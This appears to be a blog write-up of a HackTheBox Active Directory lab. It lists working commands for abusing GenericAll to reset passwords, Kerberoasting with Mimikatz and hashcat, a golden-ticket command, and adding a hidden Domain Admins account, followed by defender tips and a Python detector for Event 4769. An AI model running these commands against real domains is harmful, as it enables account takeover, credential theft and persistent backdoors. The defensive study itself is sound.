HackTheBox Administrator: Assumed Breach & Active Directory Exploitation

The HackTheBox Administrator video is now up! This is an assumed breach box, meaning we start out with credentials. The path is primarily Active Directory (AD), taking advantage of GenericAll to set a password and GenericWrite to set an account up for Kerberoasting: Watch the Video.

You Should Know:

1. Exploiting GenericAll in Active Directory

The GenericAll privilege grants full control over an object, allowing attackers to reset passwords or modify attributes. Below are key commands to abuse this:

  • PowerShell (using the ActiveDirectory module):

    # Check for GenericAll privileges on a user/computer object
    Get-ADUser -Identity TargetUser | Select-Object DistinguishedName, ObjectClass
    Get-Acl "AD:\$((Get-ADUser TargetUser).DistinguishedName)" |
        Select-Object -ExpandProperty Access |
        Where-Object { $_.ActiveDirectoryRights -match "GenericAll" }

    # Reset the user's password (if GenericAll is granted); -Reset avoids the old-password prompt
    Set-ADAccountPassword -Identity TargetUser -Reset -NewPassword (ConvertTo-SecureString "NewPass123!" -AsPlainText -Force)

  • Using PowerView (offensive PowerShell):

    # Find objects where the current user has GenericAll
    Find-InterestingDomainAcl -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -match "GenericAll" }

    # Force a password change
    Set-DomainUserPassword -Identity TargetUser -AccountPassword (ConvertTo-SecureString "HackTheBox!" -AsPlainText -Force)

2. Abusing GenericWrite for Kerberoasting

GenericWrite allows modifying the target object's attributes, including servicePrincipalName; once an SPN is set on an account, that account becomes a Kerberoasting target (its service ticket can be requested and the hash cracked offline).

  • Extracting Service Principal Names (SPNs) for Kerberoasting:

    # Using PowerView
    Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname

    # Request a TGS ticket so it can be exported for offline cracking
    Add-Type -AssemblyName System.IdentityModel
    New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dc01.htb.local"

  • Exporting Tickets with Mimikatz (Windows):

    mimikatz.exe "kerberos::list /export" 
    

  • Cracking with Hashcat (Linux):

    hashcat -m 13100 kerberoast_hashes.txt rockyou.txt -O -w 4 
    

3. Post-Exploitation: Maintaining Access

After compromising an account, ensure persistence:

  • Golden Ticket Attack (Mimikatz):

    mimikatz.exe "kerberos::golden /user:Administrator /domain:htb.local /sid:S-1-5-21-... /krbtgt:KRBTGT_HASH /ptt" 
    

  • Creating a Hidden User (Windows):

    net user eviladmin P@ssw0rd123 /add /domain 
    net group "Domain Admins" eviladmin /add /domain 
    

What Undercode Say:

This HackTheBox challenge demonstrates real-world AD exploitation techniques. Key takeaways:
– GenericAll and GenericWrite are dangerous permissions that should be audited.
– Kerberoasting remains a prevalent attack vector in AD environments.
– Always monitor SPN changes and unusual ticket requests in logs.

For defenders:

  • Restrict PowerShell remoting and disable CredSSP delegation (Disable-WSManCredSSP).
  • Enable Kerberos logging (Audit Kerberos Service Ticket Operations, which produces Event ID 4769).
  • Use LAPS (Local Administrator Password Solution) to mitigate lateral movement.
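Detection counterpart to the takeaways above (monitor unusual ticket requests; Audit Kerberos Service Ticket Operations produces Event ID 4769): an added Python example, not from the video or this post, that runs a simple Kerberoasting heuristic over constructed, flattened 4769 records. The field names, the RC4 check, the threshold and the window are assumptions for the example; a real pipeline would feed it events exported from a SIEM or Get-WinEvent.

```python
"""Flag Kerberoast-like activity in Windows Security Event ID 4769 records.

Assumed heuristics: RC4-HMAC (0x17) service tickets, which roasting tools prefer
because they crack faster, requested by one account for several distinct
user-based service accounts (names without a trailing '$') in a short window.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"

# Constructed sample records, flattened to key=value pairs (not real exported logs).
SAMPLE_4769 = """
time=2024-05-01T09:00:01;requester=alice@HTB.LOCAL;service=svc_sql;enc=0x17
time=2024-05-01T09:00:02;requester=alice@HTB.LOCAL;service=svc_web;enc=0x17
time=2024-05-01T09:00:02;requester=alice@HTB.LOCAL;service=svc_backup;enc=0x17
time=2024-05-01T09:00:03;requester=alice@HTB.LOCAL;service=DC01$;enc=0x17
time=2024-05-01T09:30:00;requester=bob@HTB.LOCAL;service=svc_sql;enc=0x12
time=2024-05-01T09:31:00;requester=bob@HTB.LOCAL;service=krbtgt;enc=0x12
""".strip().splitlines()

def parse_4769(line):
    """Turn one flattened record into a dict with a datetime 'time' field."""
    fields = dict(kv.split("=", 1) for kv in line.strip().strip(";").split(";"))
    fields["time"] = datetime.fromisoformat(fields["time"])
    return fields

def is_user_service_account(service_name):
    """Computer accounts end in '$' and krbtgt is the TGT service; neither is a roasting target."""
    name = service_name.lower()
    return not name.endswith("$") and name != "krbtgt"

def detect_kerberoast(records, window=timedelta(minutes=5), min_distinct_spns=3):
    """Return {requester: sorted list of service accounts} for requesters that trip the rule."""
    by_requester = defaultdict(list)
    for r in records:
        if r["enc"] == RC4_HMAC and is_user_service_account(r["service"]):
            by_requester[r["requester"]].append((r["time"], r["service"]))
    hits = {}
    for requester, events in by_requester.items():
        events.sort()  # sliding window over time-ordered events
        for i, (start, _) in enumerate(events):
            in_window = {svc for t, svc in events[i:] if t - start <= window}
            if len(in_window) >= min_distinct_spns:
                hits[requester] = sorted(in_window)
                break
    return hits

if __name__ == "__main__":
    for who, services in detect_kerberoast([parse_4769(l) for l in SAMPLE_4769]).items():
        print(f"possible Kerberoasting by {who}: {', '.join(services)}")
```

Tune the window and threshold to the domain's normal ticket volume; the RC4 filter only helps where AES is the default encryption type.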

Expected Output:

A compromised AD environment where an attacker leverages GenericAll for password reset and GenericWrite for Kerberoasting, leading to domain escalation.

References:

Reported By: Ippsec Hackthebox – Hackers Feeds